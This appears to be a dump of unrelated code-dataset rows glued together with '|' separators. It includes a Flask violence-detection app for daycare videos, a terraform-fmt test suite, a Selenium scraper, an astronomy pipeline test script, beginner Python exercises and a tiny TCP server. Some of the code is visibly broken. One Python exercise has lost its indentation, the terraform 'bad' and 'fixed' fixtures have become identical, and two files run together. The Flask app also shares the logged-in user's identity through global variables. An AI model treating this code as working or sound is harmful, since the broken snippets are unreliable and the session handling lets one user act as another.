    status, current_user, current_location = check_login(email, password)
    if not status:
        flash("please put correct email or password")
        return render_template('index.html')
    return render_template('main.html')
@app.route('/logout')
def logout():
    """Log out and return to the landing page.

    Also clears the module-level session globals — previously they kept
    the old user's id/location, so later requests could still act with
    the logged-out user's identity.
    """
    global current_user, current_location
    current_user = None
    current_location = None
    return render_template('index.html')
@app.route('/register',methods=['GET','POST'])
def register():
    """Registration page: GET shows the form, POST creates the user.

    Validates that the email is unused and all fields are present, looks
    up the Location row matching the two-part address, then commits the
    new User with a hashed password.
    """
    if request.method == 'GET':
        return render_template('register.html')
    else:
        name = request.form.get('name')
        password = get_hashed_password(request.form.get('password'))
        email = request.form.get('email')
        officenum = request.form.get('officenum')
        location1 = request.form.get('locate1')
        location2 = request.form.get('locate2')
        department = request.form.get('dept')
        ph1 = request.form.get('ph_num1')
        ph2 = request.form.get('ph_num2')
        ph3 = request.form.get('ph_num3')
        if check_email(email):
            flash('email already exists')
            return render_template('register.html')
        elif not (name and password and email and officenum and location1 and location2 and department and ph1 and ph2 and ph3):
            flash('fill all the area')
            return render_template('register.html')
        else:
            # Location name is stored as "<region> <district>" in the DB.
            location_id = Location.query.filter(Location.name==location1+' '+location2).one().id
            user = User(
                email=email,
                pw=password,
                office_num=officenum,
                department=department,
                name=name,
                ph_num1=ph1,
                ph_num2=ph2,
                ph_num3=ph3,
                loc_id = location_id)
            db.session.add(user)
            db.session.commit()
            flash('register finished')
            return render_template('index.html')
@app.route('/video')
def video():
    """List unchecked videos for the current user's location.

    Builds two orderings of the same rows — by detection accuracy and by
    detection time — and passes both to the template.
    """
    # get data by current_location
    video_data = Video.query.filter_by(loc_id=current_location, status=video_status['need_check']).all()
    data = list()
    for item in video_data:
        daycare_info = DaycareCenter.query.filter_by(id=item.dc_id).one()
        # HTML tooltip body describing the daycare center (Korean labels).
        daycare_description = "어린이집명 : {}<br>원장 : {}<br>주소 : {}<br>전화번호 : {}-{}-{}".format(daycare_info.name,daycare_info.chief_staff_name,daycare_info.address, daycare_info.ph_num1,daycare_info.ph_num2,daycare_info.ph_num3)
        data.append({
            "index":item.id,
            "place":daycare_info.name,
            "time":convert_datetime(item.detection_time),
            "time_unix":item.detection_time,
            "accuracy":str(item.accuracy) + ' %',
            "accuracy_":item.accuracy,      # raw value used only for sorting
            "video_path":item.name,
            "video_info":daycare_description
        })
    acc_sorted_data = sorted(data, key=lambda x: int(x['accuracy_']), reverse=True)
    time_sorted_data = sorted(data, key=lambda x:int(x['time_unix']), reverse=True)
    return render_template('video.html',
                            acc_sorted_data=acc_sorted_data,
                            time_sorted_data=time_sorted_data,
                            data_length=len(video_data),
                            video_info="Video Description")
@app.route('/list')
def listing():
    """List police reports filed for the current user's location,
    newest first, joined with their daycare and video details."""
    report_data = ReportList.query.filter_by(loc_id=current_location).all()
    data = list()
    for item in report_data:
        daycare_info = DaycareCenter.query.filter_by(id=item.dc_id).one()
        video_info = Video.query.filter_by(id=item.vid_id).one()
        # HTML tooltip body: accuracy plus daycare details (Korean labels).
        daycare_description = "영상 정확도 : {}<br>어린이집명 : {}<br>원장 : {}<br>주소 : {}<br>전화번호 : {}-{}-{}".format(str(video_info.accuracy) + '%', daycare_info.name,daycare_info.chief_staff_name,daycare_info.address, daycare_info.ph_num1,daycare_info.ph_num2,daycare_info.ph_num3)
        data.append({
            "index":item.id,
            "daycare":daycare_info.name,
            "report_time":convert_datetime(item.time),
            "time_unix":item.time,
            "action_time": convert_datetime(video_info.detection_time),
            "video_path": video_info.name,
            "video_info":daycare_description,
            "police_station":item.police_name,
            "police_status":item.status
        })
    time_sorted_data = sorted(data, key=lambda x:int(x['time_unix']), reverse=True)
    return render_template('list.html',
                            time_sorted_data=time_sorted_data,
                            data_length=len(time_sorted_data),
                            video_info="Video Description"
                            )
@app.route('/report/<video_id>')
def report_police(video_id):
    """Mark a video as reported and create a ReportList row assigned to
    a (randomly picked) police station, then return to the video list."""
    # Candidate police stations/substations (Korean names).
    police_station = ['답십리지구대', '용신지구대', '청량리파출소', '제기파출소', '전농1파출소', '전농2파출소','장안1파출소', '장안2파출소', '이문지구대', '휘경파출소', '회기파출소']
    video = db.session.query(Video).get(int(video_id))
    video.status = video_status['reported']
    report_data = ReportList(
        # + 9h — presumably UTC -> KST adjustment; confirm server timezone.
        time = time.time() + 9 * 3600,
        police_name = np.random.choice(police_station, 1)[0],
        status = '출동 전',
        loc_id = video.loc_id,
        dc_id = video.dc_id,
        vid_id = video.id
        )
    db.session.add(report_data)
    db.session.commit()
    return redirect(url_for('video'))
@app.route('/safe/<video_id>')
def safe_video(video_id):
    """Mark a flagged video as safe, then return to the video list."""
    record = db.session.query(Video).get(int(video_id))
    record.status = video_status['safe']
    db.session.commit()
    return redirect(url_for('video'))
@app.route('/predict', methods=['POST'])
def prediction():
    """Receive an uploaded clip, score it with the violence model, file
    or flag it by threshold, and answer '1' (violent) or '0'.

    Side effects: writes the clip under save_video_path, copies/renames
    it into the violence/uncertain folders, and inserts Video/ReportList
    rows via add_video_db / add_report_db.
    """
    if request.method == 'POST':
        # + 9h — presumably UTC -> KST adjustment; confirm server timezone.
        current_time = time.time()+9*60*60
        end = time.time()  # start of timing for the log line below
        file = request.files['file']
        frames = file.read()
        FILE_OUTPUT = daycare_center_name + '_' + str(time.strftime('%Y-%m-%d_%H_%M_%S %p', time.gmtime(current_time))) + '.mp4'
        out_file = open(save_video_path + FILE_OUTPUT, "wb")
        out_file.write(frames)
        out_file.close()
        video_path = save_video_path + FILE_OUTPUT
        video = read_video(video_path)
        val_loader = data_loader(args, video)
        model.eval()
        for i, (input) in enumerate(val_loader):
            # NOTE(review): Variable(volatile=True) was removed in modern
            # PyTorch (>=0.4; use torch.no_grad()) — confirm pinned version.
            input_var = torch.autograd.Variable(input, volatile=True)
            input_var = input_var.cuda()
            # compute output
            output_dict = model(input_var)
        # Uses output_dict from the final batch; class-1 probability as %.
        model_ret = output_dict['classification'].cpu().detach().numpy()[0][1] * 100
        # Violence
        if model_ret > violence_threshold:
            print('-----------------violence detected!!!!!!----------------')
            print(model_ret, '% violence detected')
            shutil.copy(save_video_path+FILE_OUTPUT, save_violence_path+FILE_OUTPUT)
            save_name = save_violence_path+FILE_OUTPUT.split('.')[0] + '_' + str(round(model_ret,2)) +'.mp4'
            os.rename( save_violence_path+FILE_OUTPUT, save_name)
            video_info = add_video_db(db, save_name, daycare_center_name, model_ret, status=1)
            report_info = add_report_db(db,video_info)
        # Uncertain
        elif model_ret > uncertain_threshold:
            print('****** uncertainty detected ******')
            print(model_ret, '% violence detected')
            shutil.copy(save_video_path+FILE_OUTPUT, save_uncertain_path+FILE_OUTPUT)
            save_name = save_uncertain_path+FILE_OUTPUT.split('.')[0] + '_' + str(round(model_ret,2)) +'.mp4'
            os.rename( save_uncertain_path+FILE_OUTPUT, save_name)
            video_info = add_video_db(db, save_name,daycare_center_name, model_ret)
        else:
            print('violence : ', round(model_ret,2),' %, - ',FILE_OUTPUT)
            os.rename(save_video_path+FILE_OUTPUT, save_video_path+FILE_OUTPUT.split('.')[0] + '_' + str(round(model_ret,2)) +'.mp4')
        print('model calulation time : ',round(time.time() - end,2), ' sec')
        if model_ret > violence_threshold:
            return json.dumps(str(1))
        else:
            return json.dumps(str(0))
if __name__ == "__main__":
    # run_with_ngrok patched app.run above, so this also opens the tunnel.
    app.run()
|
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import textwrap
from typing import List, NewType
import pytest
from pants.backend.terraform import tool
from pants.backend.terraform.lint.tffmt import tffmt
from pants.backend.terraform.lint.tffmt.tffmt import TffmtRequest
from pants.backend.terraform.target_types import TerraformFieldSet, TerraformModuleTarget
from pants.backend.terraform.tool import TerraformTool
from pants.core.goals.fmt import FmtResult, Partitions
from pants.core.util_rules import external_tool, source_files
from pants.core.util_rules.external_tool import ExternalToolVersion
from pants.core.util_rules.source_files import SourceFiles, SourceFilesRequest
from pants.engine.addresses import Address
from pants.engine.fs import CreateDigest, Digest, DigestContents, FileContent
from pants.engine.internals.native_engine import Snapshot
from pants.engine.target import Target
from pants.testutil.rule_runner import QueryRule, RuleRunner
# Distinct alias so fixtures can't be confused with plain List[str].
RuleRunnerOptions = NewType("RuleRunnerOptions", List[str])
# All terraform versions Pants knows how to download.
available_tf_versions = [
    ExternalToolVersion.decode(v).version for v in TerraformTool.default_known_versions
]
# Test matrix: the default version plus the first known version.
tf_versions = [TerraformTool.default_version, available_tf_versions[0]]
# uncomment to run against *all* terraform versions
# tf_versions = list(set(available_tf_versions))
@pytest.fixture(params=tf_versions)
def rule_runner_options(request) -> RuleRunnerOptions:
    """Backend/download options, parametrized over the terraform versions
    under test."""
    options = [
        "--backend-packages=pants.backend.experimental.terraform",
        "--backend-packages=pants.backend.experimental.terraform.lint.tffmt",
        f"--download-terraform-version={request.param}",
    ]
    return RuleRunnerOptions(options)
@pytest.fixture()
def rule_runner() -> RuleRunner:
    """A RuleRunner wired with the terraform/tffmt rules and the query
    rules the tests below request."""
    return RuleRunner(
        target_types=[TerraformModuleTarget],
        rules=[
            *external_tool.rules(),
            *tffmt.rules(),
            *tool.rules(),
            *source_files.rules(),
            QueryRule(Partitions, (TffmtRequest.PartitionRequest,)),
            QueryRule(FmtResult, (TffmtRequest.Batch,)),
            QueryRule(SourceFiles, (SourceFilesRequest,)),
        ],
    )
GOOD_SOURCE = FileContent(
"good.tf",
textwrap.dedent(
"""\
locals {
foo = "xyzzy"
}
resource "test_instance" "default" {
key = "value-${local.foo}"
longer_key = "bar"
}
"""
).encode("utf-8"),
)
# The misformatted part is the `key` property in the resource block.
BAD_SOURCE = FileContent(
"bad.tf",
textwrap.dedent(
"""\
resource "test_instance" "default" {
key = "foo"
longer_key = "bar"
}
"""
).encode("utf-8"),
)
FIXED_BAD_SOURCE = FileContent(
"bad.tf",
textwrap.dedent(
"""\
resource "test_instance" "default" {
key = "foo"
longer_key = "bar"
}
"""
).encode("utf-8"),
)
def make_target(
    rule_runner: RuleRunner, source_files: List[FileContent], *, target_name="target"
) -> Target:
    """Write a BUILD file plus the given sources and resolve the target."""
    files = {src.path: src.content.decode() for src in source_files}
    files["BUILD"] = f"terraform_module(name='{target_name}')\n"
    rule_runner.write_files(files)
    return rule_runner.get_target(Address("", target_name=target_name))
def run_tffmt(
    rule_runner: RuleRunner,
    targets: List[Target],
    options: RuleRunnerOptions,
) -> FmtResult | None:
    """Partition the targets' sources and run one tffmt batch over them.

    Returns None when the partitioner produced no partitions (e.g. the
    formatter was skipped); otherwise asserts there is exactly one
    partition covering all input files and returns its FmtResult.
    """
    rule_runner.set_options(options)
    field_sets = [TerraformFieldSet.create(tgt) for tgt in targets]
    input_sources = rule_runner.request(
        SourceFiles,
        [
            SourceFilesRequest(field_set.sources for field_set in field_sets),
        ],
    )
    partitions = rule_runner.request(
        Partitions,
        [
            TffmtRequest.PartitionRequest(tuple(field_sets)),
        ],
    )
    if not partitions:
        return None
    assert len(partitions) == 1
    partition = partitions[0]
    assert set(partition.elements) == set(input_sources.snapshot.files)
    fmt_result = rule_runner.request(
        FmtResult,
        [
            TffmtRequest.Batch(
                "",
                partition.elements,
                partition_metadata=partition.metadata,
                snapshot=input_sources.snapshot,
            ),
        ],
    )
    return fmt_result
def get_content(rule_runner: RuleRunner, digest: Digest) -> DigestContents:
    """Materialize the file contents behind *digest*."""
    return rule_runner.request(DigestContents, [digest])
def get_snapshot(rule_runner: RuleRunner, source_files: List[FileContent]) -> Snapshot:
    """Build a Snapshot containing exactly *source_files*."""
    digest = rule_runner.request(Digest, [CreateDigest(source_files)])
    return rule_runner.request(Snapshot, [digest])
def test_passing_source(rule_runner: RuleRunner, rule_runner_options: RuleRunnerOptions) -> None:
    """tffmt leaves an already-formatted file untouched."""
    target = make_target(rule_runner, [GOOD_SOURCE])
    fmt_result = run_tffmt(rule_runner, [target], rule_runner_options)
    assert fmt_result
    assert fmt_result.stdout == ""
    assert fmt_result.output == get_snapshot(rule_runner, [GOOD_SOURCE])
    assert fmt_result.did_change is False
def test_failing_source(rule_runner: RuleRunner, rule_runner_options: RuleRunnerOptions) -> None:
    """tffmt rewrites a misformatted file and reports a change.

    (Removed a leftover debug print that dumped the formatted digest
    contents to stdout on every run.)
    """
    target = make_target(rule_runner, [BAD_SOURCE])
    fmt_result = run_tffmt(rule_runner, [target], rule_runner_options)
    assert fmt_result
    assert fmt_result.stderr == ""
    assert fmt_result.output == get_snapshot(rule_runner, [FIXED_BAD_SOURCE])
    assert fmt_result.did_change is True
def test_mixed_sources(rule_runner: RuleRunner, rule_runner_options: RuleRunnerOptions) -> None:
    """One target with a good and a bad file: only the bad one changes."""
    target = make_target(rule_runner, [GOOD_SOURCE, BAD_SOURCE])
    fmt_result = run_tffmt(rule_runner, [target], rule_runner_options)
    assert fmt_result
    assert fmt_result.output == get_snapshot(rule_runner, [GOOD_SOURCE, FIXED_BAD_SOURCE])
    assert fmt_result.did_change is True
def test_multiple_targets(rule_runner: RuleRunner, rule_runner_options: RuleRunnerOptions) -> None:
    """Two targets are formatted together in a single batch."""
    targets = [
        make_target(rule_runner, [GOOD_SOURCE], target_name="tgt_good"),
        make_target(rule_runner, [BAD_SOURCE], target_name="tgt_bad"),
    ]
    fmt_result = run_tffmt(rule_runner, targets, rule_runner_options)
    assert fmt_result
    assert fmt_result.output == get_snapshot(rule_runner, [GOOD_SOURCE, FIXED_BAD_SOURCE])
    assert fmt_result.did_change is True
def test_skip(rule_runner: RuleRunner, rule_runner_options: RuleRunnerOptions) -> None:
    """With --terraform-fmt-skip, no partitions (and no FmtResult) exist."""
    target = make_target(rule_runner, [BAD_SOURCE])
    rule_runner_options.append("--terraform-fmt-skip")  # skips running terraform
    fmt_result = run_tffmt(rule_runner, [target], rule_runner_options)
    assert fmt_result is None
|
class NotMutable(AttributeError):
    """Raised when mutation of a read-only object is attempted."""
def not_mutable(*args, **kwargs):
    """Setter stub that rejects any call by raising NotMutable."""
    raise NotMutable()
|
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
class NavigationManager():
    """Drives a Chrome WebDriver through a paginated case listing."""

    def __init__(self, localDriverPath, chrome_options):
        # NOTE(review): executable_path/chrome_options are deprecated in
        # Selenium 4 (use Service/options kwargs) — confirm pinned version.
        self.driver = webdriver.Chrome(executable_path=localDriverPath, chrome_options=chrome_options)
        self.currentUrl = ''

    #exception to be managed and logged
    def get_start_page(self, startingUrl):
        """Navigate the browser to the initial listing page."""
        self.currentUrl = startingUrl
        self.driver.get(self.currentUrl)

    def check_for_next_page_existence(self):
        """Return True when a 'next page' pagination link is present."""
        try:
            self.driver.find_element_by_xpath("//div[@id='selector']/ul/li/a[@class = 'page-link next' and contains(@href, '#page-')]")
        except NoSuchElementException as exception:
            return False
        else:
            return True

    #exception to be managed and logged
    def get_next_page(self, startingUrl):
        """Click the 'next' link and record the resulting URL.

        startingUrl is unused — kept for interface compatibility.
        """
        self.driver.find_element_by_xpath("//div[@id='selector']/ul/li/a[@class = 'page-link next' and contains(@href, '#page-')]").click()
        self.currentUrl = self.driver.current_url

    def find_cases_table(self):
        """Return the outer HTML of the cases table element."""
        htmlTable = self.driver.find_element_by_id('tablePerkaraAll').get_attribute('outerHTML')
        return htmlTable
#Main python script for the VEGAS analysis pipeline
import sys
import time
from plutils import *
# First CLI argument: path to the pipeline instructions file.
inst_filename = sys.argv[1]
# EAFP existence/readability check: open, re-raise on failure, close on success.
try:
    f = open(inst_filename)
except OSError:
    print("Instructions file ", inst_filename, " could not be opened.")
    raise
else:
    f.close()
print(inst_filename)
testmod.testmod()
#Test the database functionality
print('-'*25)
print('Testing DB functionality')
# Minimal read-only config for the VERITAS database connection.
tmpCD={'GLOBALCONFIG' : {'DBHOSTNAME' : 'romulus.ucsc.edu', 'DBNAME' : 'VERITAS', 'DBUSERNAME' : 'readonly'}}
dbcnx=database.DBConnection(configdict=tmpCD)
host=dbcnx.host
db=dbcnx.db
user=dbcnx.user
print('host = ', host)
print('db = ', db)
print('user = ', user)
# Sample run number used to exercise the lookup helpers.
tmp_runnum='79227'
print('Info for run ', tmp_runnum, ':')
flasher=dbcnx.get_calib_run(tmp_runnum)
ddate=dbcnx.get_ddate(tmp_runnum)
src_id=dbcnx.get_source_id(tmp_runnum)
print(' flasher run = ', flasher)
print(' ddate = ', ddate)
print(' src_id = ', src_id)
# Disabled condor smoke test kept as a (no-op) string literal.
'''
#Test condor functionality
print('-'*25)
print('Testing condor functionality')
print('Attempting initalization/configuration...')
cs=condor.CondorJob(executable='sleep_test.sh', arguments='5', universe='vanilla', workingdir='/home/vhep/ssscott/tmp', log='condor_test.log', output='condor_test.out', error='condor_test.error', requirements='')
print(' status = ', cs.status)
print('Attempting submission...')
cs.submit()
print(' status = ', cs.status)
print(' job id = ', cs.jobid)
print('Waiting for test job to terminate...')
while(cs.get_status() != 'terminated'):
    print(' status = ', cs.get_status())
    time.sleep(1)
print('Job should have terminated...')
print(' status = ', cs.status)
print(' exit status = ', cs.exitstatus)
'''
print('-'*25)
print('Testing instructions file instreader')
# Parse the instructions file into the pipeline's config dictionary.
read_inst = instreader.InstFileReader(inst_filename)
configdict = read_inst.get_config_dict()
print ('configdict: ', configdict)
# Disabled configwriter smoke test kept as a (no-op) string literal.
"""
print('-'*25)
print('Testing config file configwriter')
cw = configwriter.ConfigWriter(configdict,'VASTAGE1:GRP1',1, '/home/vhep/ssscott/tmp')
cw.write('config')
cw.write('cuts')
print(' Config file: ', cw.configfilepath)
print(' Cuts file: ', cw.cutsfilepath)
"""
# Run Group Manager
print('-'*25)
print('Testing run group manager functionality')
rgm = runmanager.RunGroupManager(configdict,dbcnx)
grpdict = rgm.get_group_dict()
print(' Groupdict:')
print(' ', grpdict)
# Two sample selections: a nested subgroup and a top-level group.
subgroup1 = 'GRP1:GRP2'
subgroup2 = 'GRP1'
print(' subgroup1: ', subgroup1)
rg1 = rgm.get_run_groups(subgroup1)
print(' ', rg1)
for grpid,rg in rg1.items():
    # Dump every data run and calibration run in the group.
    for rid,r in rg.datarundict.items():
        print(' datarun: {0} {1} {2} {3}'.format(r.runnum, r.ddate, r.calib, r.timecuts))
    for rid,r in rg.calibrundict.items():
        print(' calibrun: {0} {1}'.format(r.runnum, r.ddate))
rg2 =rgm.get_run_groups(subgroup2)
print(' subgroup2: ', rg2)
print(' ', rg2)
for grpid,rg in rg2.items():
    for rid,r in rg.datarundict.items():
        print(' datarun: {0} {1} {2} {3}'.format(r.runnum, r.ddate, r.calib, r.timecuts))
    for rid,r in rg.calibrundict.items():
        print(' calibrun: {0} {1}'.format(r.runnum, r.ddate))
#Analysis Testing
print('-'*25)
print('Initalizing analysis core...')
ac = analysis.AnalysisCore(configdict=configdict, runmanager=rgm)
print('Status = {0}'.format(ac.get_status()))
print('Executing...')
ac.execute()
|
# Exercício 5.26 - Livro
dividendo = int(input('Digite o dividendo: '))
divisor = int(input('Digite o divisor: '))
div = dividendo
cont = 0
while True:
div = div - divisor
cont = cont + 1
if div == 0:
resultado = cont
resto = 0
break
elif div < 0:
resultado = cont - 1
resto = div + divisor
break
print(f'Resto da divisão: {resto}')
|
age = 25
num = 0
# Count num from 0 up to age (exclusive).
while num < age:
    # NOTE(review): the outer `num == 0` guard means only 0 is ever
    # printed; if the intent was to print every even number below age,
    # that guard should be removed — confirm intent before changing.
    if num == 0:
        if num % 2 == 0:
            print(num)
    num+=1
|
#!/usr/bin/python3
"""Minimal TCP server: bind port 5555 and accept a single connection."""
import socket

host = ''      # bind on all interfaces
port = 5555

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.bind((host, port))
except OSError as e:
    # Previously ANY bind error was printed and ignored, after which the
    # script went on to listen()/accept() on an unbound socket (i.e. on an
    # arbitrary ephemeral port). Treat bind failure as fatal instead, and
    # catch only OSError rather than every exception.
    print(str(e))
    raise SystemExit(1)
s.listen()
conn, addr = s.accept()
print("connected to:", addr[0], addr[1])
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.